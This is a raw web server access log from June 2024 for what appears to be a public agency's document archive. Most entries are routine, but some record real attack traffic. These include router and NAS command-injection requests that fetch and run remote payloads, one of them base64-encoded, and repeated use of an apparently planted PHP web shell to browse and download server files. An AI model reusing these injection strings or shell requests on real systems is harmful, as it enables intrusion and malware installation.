201.245.192.253 - - [16/Jun/2024:11:09:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:11:09:46 -0500] "GET /BLA/resoluciones/AUTOS%202016/2744.pdf HTTP/1.1" 200 629491
186.29.98.69 - - [16/Jun/2024:11:10:05 -0500] "GET /forest/ HTTP/1.1" 200 12041
186.29.98.69 - - [16/Jun/2024:11:10:13 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
201.245.192.253 - - [16/Jun/2024:11:10:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:11:10:27 -0500] "GET /BLA/resoluciones/AUTOS%202016/2777.pdf HTTP/1.1" 200 402710
216.244.66.195 - - [16/Jun/2024:11:11:07 -0500] "GET /BLA/resoluciones/AUTOS%202016/2815.pdf HTTP/1.1" 200 387773
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [16/Jun/2024:11:11:22 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
201.245.192.253 - - [16/Jun/2024:11:11:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:11:11:23 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [16/Jun/2024:11:11:23 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [16/Jun/2024:11:11:23 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [16/Jun/2024:11:11:23 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [16/Jun/2024:11:11:23 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [16/Jun/2024:11:11:23 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [16/Jun/2024:11:11:23 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
216.244.66.195 - - [16/Jun/2024:11:11:41 -0500] "GET /BLA/resoluciones/AUTOS%202016/3061.pdf HTTP/1.1" 200 412358
172.22.2.4 - - [16/Jun/2024:11:10:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.22.67 - - [16/Jun/2024:11:11:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2001-2050%5C&f=00002023.tif&white=1 HTTP/1.1" 200 97946
66.249.66.19 - - [16/Jun/2024:11:12:12 -0500] "GET /Publicaciones/2024EE96715.pdf HTTP/1.1" 404 227
216.244.66.195 - - [16/Jun/2024:11:12:15 -0500] "GET /BLA/resoluciones/AUTOS%202016/3134.pdf HTTP/1.1" 200 382630
201.245.192.253 - - [16/Jun/2024:11:12:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:11:12:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [16/Jun/2024:11:11:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
216.244.66.195 - - [16/Jun/2024:11:12:48 -0500] "GET /BLA/resoluciones/AUTOS%202007/1299.pdf HTTP/1.1" 200 92522
216.244.66.195 - - [16/Jun/2024:11:13:17 -0500] "GET /BLA/resoluciones/AUTOS%202007/1961.pdf HTTP/1.1" 200 469312
201.245.192.253 - - [16/Jun/2024:11:13:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:11:13:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:11:13:55 -0500] "GET /BLA/resoluciones/AUTOS%202007/1970.pdf HTTP/1.1" 200 50588
52.167.144.212 - - [16/Jun/2024:11:14:10 -0500] "GET /BLA/resoluciones/AUTOS%202014/2041.pdf HTTP/1.1" 200 312290
201.245.192.253 - - [16/Jun/2024:11:14:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:11:14:25 -0500] "GET /BLA/resoluciones/AUTOS%202010/1395.pdf HTTP/1.1" 200 247691
216.244.66.195 - - [16/Jun/2024:11:14:54 -0500] "GET /BLA/resoluciones/AUTOS%202010/1469.pdf HTTP/1.1" 200 285609
65.109.109.110 - - [16/Jun/2024:11:15:03 -0500] "GET /IsolucionSDA/bancoconocimiento/P/Programadegestiondocumental2016-2019/Programadegestiondocumental2016-2019.asp HTTP/1.1" 404 5032
216.244.66.195 - - [16/Jun/2024:11:15:22 -0500] "GET /BLA/resoluciones/AUTOS%202010/1497.pdf HTTP/1.1" 200 1478500
201.245.192.253 - - [16/Jun/2024:11:15:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.50.40 - - [16/Jun/2024:11:16:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6581.pdf&ft=notepad&white=1 HTTP/1.1" 200 511689
216.244.66.195 - - [16/Jun/2024:11:16:17 -0500] "GET /BLA/resoluciones/AUTOS%202010/1667.pdf HTTP/1.1" 200 3056420
201.245.192.253 - - [16/Jun/2024:11:16:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
43.157.59.127 - - [16/Jun/2024:11:16:52 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [16/Jun/2024:11:16:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33880
201.245.192.253 - - [16/Jun/2024:11:16:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34572
216.244.66.195 - - [16/Jun/2024:11:16:58 -0500] "GET /BLA/resoluciones/AUTOS%202010/1909.pdf HTTP/1.1" 200 148169
201.245.192.253 - - [16/Jun/2024:11:17:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:11:17:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:11:17:29 -0500] "GET /BLA/resoluciones/AUTOS%202010/2298.pdf HTTP/1.1" 200 1581752
172.22.2.4 - - [16/Jun/2024:11:16:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:11:18:15 -0500] "GET /BLA/resoluciones/AUTOS%202010/3567.pdf HTTP/1.1" 200 1744966
201.245.192.253 - - [16/Jun/2024:11:18:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:11:18:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:11:16:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
216.244.66.195 - - [16/Jun/2024:11:18:46 -0500] "GET /BLA/resoluciones/AUTOS%202010/3741.pdf HTTP/1.1" 200 104202
201.245.192.253 - - [16/Jun/2024:11:18:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34583
201.245.192.253 - - [16/Jun/2024:11:19:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:11:19:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34572
47.128.30.216 - - [16/Jun/2024:11:20:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2201-2250%5C&f=00002228.tif&white=1 HTTP/1.1" 200 20228
201.245.192.253 - - [16/Jun/2024:11:20:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
65.109.109.110 - - [16/Jun/2024:11:20:58 -0500] "GET /isolucionsda/bancoconocimiento/R/Resolucion715de31demarzode2017/Resolucion715de31demarzode2017.asp?IdArticulo=10934 HTTP/1.1" 404 5025
201.245.192.253 - - [16/Jun/2024:11:21:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
65.109.109.110 - - [16/Jun/2024:11:22:20 -0500] "GET /isolucionsda/BancoConocimiento/A/Administracionyserviciodelospuntosdeatencionalciudadano_v4/Administracionyserviciodelospuntosdeatencionalciudadano_v4.asp?IdArticulo=2017 HTTP/1.1" 404 5136
201.245.192.253 - - [16/Jun/2024:11:22:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:11:22:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
78.46.69.214 - - [16/Jun/2024:11:22:38 -0500] "GET /isolucionsda/Arriba.asp?Pagina=bancoconocimiento%2FR%2FResolucion715de31demarzode2017%2FResolucion715de31demarzode2017.asp&IdArticulo=10934&Codigo=&Fecha=&Version=&Procedimiento=&cliente= HTTP/1.1" 500 9068
20.197.112.233 - - [16/Jun/2024:11:22:58 -0500] "GET /Publicaciones/2024EE103955.pdf HTTP/1.1" 404 228
201.245.192.253 - - [16/Jun/2024:11:23:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:11:23:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:11:21:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:11:22:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:11:24:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.169 - - [16/Jun/2024:11:24:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=widgets.min.js&ft=download HTTP/1.1" 200 8501
66.249.66.21 - - [16/Jun/2024:11:24:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/3501.pdf HTTP/1.1" 200 394178
66.249.66.19 - - [16/Jun/2024:11:25:00 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202024/01283.pdf HTTP/1.1" 304 -
66.249.66.20 - - [16/Jun/2024:11:25:01 -0500] "GET /Residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 200 12356716
66.249.66.19 - - [16/Jun/2024:11:25:03 -0500] "GET /Publicaciones/2024EE64668.pdf HTTP/1.1" 404 227
216.244.66.195 - - [16/Jun/2024:11:25:12 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:11:25:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
45.148.10.174 - - [16/Jun/2024:11:25:42 -0500] "GET /cgi-bin/nas_sharing.cgi?cmd=15&passwd=&system=ZWNobwktZQkiXHg2M1x4NjRceDIwXHgyZlx4NzRceDZkXHg3MFx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2JceDIwXHg3N1x4NjdceDY1XHg3NFx4MjBceDY4XHg3NFx4NzRceDcwXHgzYVx4MmZceDJmXHgzNFx4MzVceDJlXHgzMVx4MzRceDM4XHgyZVx4MzFceDMwXHgyZVx4MzdceDM4XHgyZlx4NzNceDY4XHg2Ylx4MjBceDdjXHg3Y1x4MjBceDYzXHg3NVx4NzJceDZjXHgyMFx4MmRceDRmXHgyMFx4NjhceDc0XHg3NFx4NzBceDNhXHgyZlx4MmZceDM0XHgzNVx4MmVceDMxXHgzNFx4MzhceDJlXHgzMVx4MzBceDJlXHgzN1x4MzhceDJmXHg3M1x4NjhceDZiXHgyMFx4N2NceDdjXHgyMFx4NzRceDY2XHg3NFx4NzBceDIwXHgyZFx4NjdceDIwXHgyZFx4NzJceDIwXHg3M1x4NjhceDZiXHgyMFx4MzRceDM1XHgyZVx4MzFceDM0XHgzOFx4MmVceDMxXHgzMFx4MmVceDM3XHgzOFx4M2JceDIwXHg2M1x4NjhceDZkXHg2Zlx4NjRceDIwXHgyYlx4NzhceDIwXHg3M1x4NjhceDZiXHgzYlx4MjBceDJlXHgyZlx4NzNceDY4XHg2Ylx4MjBceDY0XHg2Y1x4NjlceDZlXHg2Ylx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2IifHNo&user=messagebus HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:11:26:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:11:26:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33880
201.245.192.253 - - [16/Jun/2024:11:26:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34572
185.244.36.236 - - [16/Jun/2024:11:27:17 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [16/Jun/2024:11:27:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:11:27:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
65.21.136.254 - - [16/Jun/2024:11:28:02 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=ListadoActas.asp&Cuallistado=ACTAS HTTP/1.1" 200 6376
172.22.2.4 - - [16/Jun/2024:11:26:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
201.245.192.253 - - [16/Jun/2024:11:28:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
135.181.31.125 - - [16/Jun/2024:11:28:27 -0500] "GET /IsolucionSDA/Scripts/customRequired/ajaxRequestExtension.js HTTP/1.1" 200 1268
216.245.221.92 - - [16/Jun/2024:11:28:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.29.58 - - [16/Jun/2024:11:28:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=media-button-image.gif&ft=notepad&white=1 HTTP/1.1" 200 200
78.46.69.214 - - [16/Jun/2024:11:28:51 -0500] "GET /IsolucionSDA/Scripts/jquery.min.js HTTP/1.1" 200 89503
201.245.192.253 - - [16/Jun/2024:11:28:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34583
172.22.2.4 - - [16/Jun/2024:11:27:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:11:29:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:11:29:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34572
172.22.2.4 - - [16/Jun/2024:11:28:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:11:30:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
176.9.137.113 - - [16/Jun/2024:11:30:56 -0500] "GET /IsolucionSDA/Scripts/customRequired/MenuUser.js HTTP/1.1" 200 9345
201.245.192.253 - - [16/Jun/2024:11:31:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:11:32:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [16/Jun/2024:11:32:21 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
201.245.192.253 - - [16/Jun/2024:11:32:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.63.41 - - [16/Jun/2024:11:32:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0846.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
52.167.144.191 - - [16/Jun/2024:11:33:16 -0500] "GET /Publicaciones/2024EE119827.pdf HTTP/1.1" 200 389540
201.245.192.253 - - [16/Jun/2024:11:33:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:11:33:27 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.209 - - [16/Jun/2024:11:33:37 -0500] "GET /Publicaciones/2024EE120059.pdf HTTP/1.1" 200 565707
176.9.137.113 - - [16/Jun/2024:11:34:11 -0500] "GET /ISOlucionSDA/bancoconocimiento/R/Resolucion363del22deabrilde2016/Resolucion363del22deabrilde2016.asp HTTP/1.1" 404 5012
185.191.127.212 - - [16/Jun/2024:11:34:19 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:11:34:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
78.46.174.47 - - [16/Jun/2024:11:34:23 -0500] "GET /IsolucionSDA/Scripts/jsUtilities.js?fecha=20150217a HTTP/1.1" 200 136227
172.22.2.4 - - [16/Jun/2024:11:33:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:11:35:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:11:34:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.19 - - [16/Jun/2024:11:36:06 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202023/00241.pdf HTTP/1.1" 304 -
186.102.76.76 - - [16/Jun/2024:11:36:22 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+Tvwm27fZrard5m9DITlKj6M1ikqcwzpx8kOvGApTzb7WJ4y8ixfEu&y=U2FsdGVkX1+3RM1DzNd0MQsVup7hzYoXzoAjRH01YoHVX4Nbl4Ur8aPdmZ+ukCFk HTTP/1.1" 200 30
186.102.76.76 - - [16/Jun/2024:11:36:22 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19U75XiNdV8Hz1Ll53RMJgtq+CRRMp4If6JzRalG5s+CUAYlvRQ9NgIwR56mw9PHawZicS8GyJhh1pFgn1YVmr6/5O0FqSyxMk=&u=U2FsdGVkX1+HI2tYtnDitOoR//YnLa1KU7Ze5r7pVt4=&y=U2FsdGVkX1+3RM1DzNd0MQsVup7hzYoXzoAjRH01YoHVX4Nbl4Ur8aPdmZ+ukCFk HTTP/1.1" 200 97
186.102.76.76 - - [16/Jun/2024:11:36:22 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18s1NN9UE/2XRbfxiXryvUmODViX86p6/m42FNLh0/h1AxToK0/z6nHm7hPnaocE4tudmKiTkA+lpUsLdTKPpddYnU5Jsiyr0XZdkSal/aTUj2GTUA41+Sf/5qEimrpnuNHEwW7gsVVBPecaV5iVh6H0VWRfvA3PdXRcjJtSPHd4OYugbWBLNRx1D7Xss4YJjIKCPoMMhWhLhOw0/cLjOpdyjmaCThilMSXOb+U8TA0JXUHoK6kGxPywHVz0JtAEV+rt+KxRDD7BZBCxykrBVhUOIsXCUKefwBq8UnHEYs+4frkYaMOmqTEIu+QcqHrVQlY2D537qEFFCafMB8STjyAImybi6AjmyErRE9S1lj6tii8yIbGwi3WEQdI82mIb6tozXwx2D21/DFnuJZWVUNncL5kB5OrXKuTmLHfVshI4P0FRaJEezR8GsbK0/uIb2T99hrgfwl5mkusch0Qy1fThiMIn1IEJ5JH+LpLr2TFHBmoz4FjNRSlkGgnZiffkmmarohV4EyMfn6xLlX+bl2qE6eWJbhx9k0LFJyU8GVwnH0xbgaG6FB7eejAsrJHMmlQJfR+M9oD+jjutpWffcNsupp8xxzDxpFbOp1FVrADqcf3RzZvDjfEMsk2buugEHU8N4niBySFpBsHoQAO4bZQnJQjX2VzFVjSEQpE5lacZ/Mdc8Xb78uLS5QgM9BrVL26xfYAN+6BZG21nMkuRU/AEhqRXC0eWFX76nOdaambMJAWX74escbkDF7OQAkCINt3vpH5fhPRa93TMUDmvn3VhsmuaJ8m+LlYEOtnR9LFRhlRqKmurplSwxEThsT9a+yn5mtHj1WRzm3vwet325sfL2bgpcWvvbPYDHQJM11kmAFgTBw6VVMeYdx7KcbY+saX7EUvGZRVXNejoXQRKewR28jtyt1/KQqn7+fVVBtOP6MlUF3U0awGkc5sG187axEsD+2evSq+XWMXyB1q+L1GPzbIEYI/EvNkCCia43IQ4tpT1j2e21KvBuX1xplLWg7LooZlDpU2EAcWb78DQzS9LEx0A8TBeZKO1xYJL0skbuJ9ZJlryyB+PiarUFWgpL/pycC0W96bDK4IJZIGUjTOosAiakRUIK6Jpni8+v17ZY+STiiJCNv7tz12fbY4DCU+iRUS/x5CW//KZBpTOhX2b7Q5XZwyLoe+8IAk1lTb87rLM5B3KtVsunM8JDiI08lrpDbEuTl2ottNSPNX056WEc/FsJTFKq0iCad76DEN04oRX96GQKZAcs+VJzbJpFKC5lWOC5p6PS/S1VVj+/NQMu39XR0iNk4UkaDTlNBMQLxyg4okUm95+bM9GVKnWgCTDCkA1TSqah8/h+MnsA8nc6Yu9+ycwUBbIehMX/R+WWIkDoAJErVe6L0SLj1WeISOezB91dCZlkK8GiNOhp0rTGG2pe62genGuUXRSppL9HF1AEBqgR/B/MNu+I+QvFkl9wNur07GWa84XVq57cxMyDMOmvcS3KccNGEfDWeSbjovrqg5cjrL00M4Cf2Hu/9DgEIjh4Cr/SpRqLYurHA0EJAWflkINmbFje3nn1+SR8060f+qUYz9Y1thZr58aLpgaqNCmHQ8qMejfgdGnSyI1Y7GDIFjXGmmfjHpESvfmRw7eiBEbrt3fwO4c+2F2lJ7myBdhjEbDi+Ac3Ngsbe2TITu+Xj3ySUJLk/qVWlmuI5WEH0J+vkTr4oyIJZNV+oTQzslqo+0Ac/GXkpMvZK/DHttGPCXq0Q=&u=U2FsdGVkX1+HI2tYtnDitOoR//YnLa1KU7Ze5r7pVt4=&y=U2FsdGVkX1+3RM1DzNd0MQsVup7hzYoXzoAjRH01YoHVX4Nbl4Ur8aPdmZ+ukCFk HTTP/1.1" 200 4607
186.102.76.76 - - [16/Jun/2024:11:36:22 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19uZrhabyCFLFeHewXjn+WWZ7pQZbfu+rA6pjQiWSQh5T8hGSr8wTbqiS3v/cIyNergxBJaHxibaiTTm5szSgAaJKjlFBtqmwEx101PGY4osgPHold3JChy5nHPIQGFWKo16xk8eCDsKUyu9MaYz3PAgOt/0+b6psOViraHrBq+a9QIV6M6IsgZuZ6qTl2UKqWorSwsD28Oo7Ir5UAsBfsCTWE/8Z4mPdeflhRhj031lrPfFkA5EVBqeoxYvx/0pT0I1daIbUGFGiTFI/VucW626MST2qAoanI/dCO8zfBUQ4WqswWsADLI+s3xMrA39AELxcvlhFriluFwJy2OZLnYA1FIy/A0ni+sOiupX8Yi6rfmFEtIJrYRHyozvOiYbEvnahj+76it2QUgWZKYourVPeY2ZG+Jm/Ht93SdyJu7jl3u7TP0pA1gEnm02SMHYoxpMO7gcMF17BIWAQNcBtxTgJztmWgQz52+KJk8THuS7XIdI21ButdVNFsToCxBfXmqhH71ZnhWE7aQzS6ZmyG5CvH32AppSkQ9i2q9ccyNYBq2gMtp8DqnC9HZ2Z6NW835evb1MOX05KJZ+Cc1Yup5W+GnurYmH1YmdQwtVH4X4v71GVch625astdiGH26kKOlKaNeMC4/mTBbAhLPRzS0JdlK0KLv298n2fZsA3N/i7KBmCEZw+a4QPLwWm0es2deMQ7d/E8ots8dQSVD5LsnqNs2hdn4dvbXbY/9eKho3yv1eXDbF6ji&u=U2FsdGVkX1+HI2tYtnDitOoR//YnLa1KU7Ze5r7pVt4=&y=U2FsdGVkX1+3RM1DzNd0MQsVup7hzYoXzoAjRH01YoHVX4Nbl4Ur8aPdmZ+ukCFk HTTP/1.1" 200 208
201.245.192.253 - - [16/Jun/2024:11:36:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.76.76 - - [16/Jun/2024:11:36:22 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+Tvwm27fZrard5m9DITlKj6M1ikqcwzpx8kOvGApTzb7WJ4y8ixfEu HTTP/1.1" 200 30244
172.22.2.4 - - [16/Jun/2024:11:36:29 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [16/Jun/2024:11:36:34 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
47.128.48.134 - - [16/Jun/2024:11:36:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=media-editor.js&ft=download&white=1 HTTP/1.1" 200 30149
201.245.192.253 - - [16/Jun/2024:11:36:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33880
201.245.192.253 - - [16/Jun/2024:11:36:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34572
201.245.192.253 - - [16/Jun/2024:11:37:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:11:37:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
65.109.109.110 - - [16/Jun/2024:11:37:28 -0500] "GET /IsolucionSDA/Content/themes/custom/jquery-ui.js HTTP/1.1" 200 554782
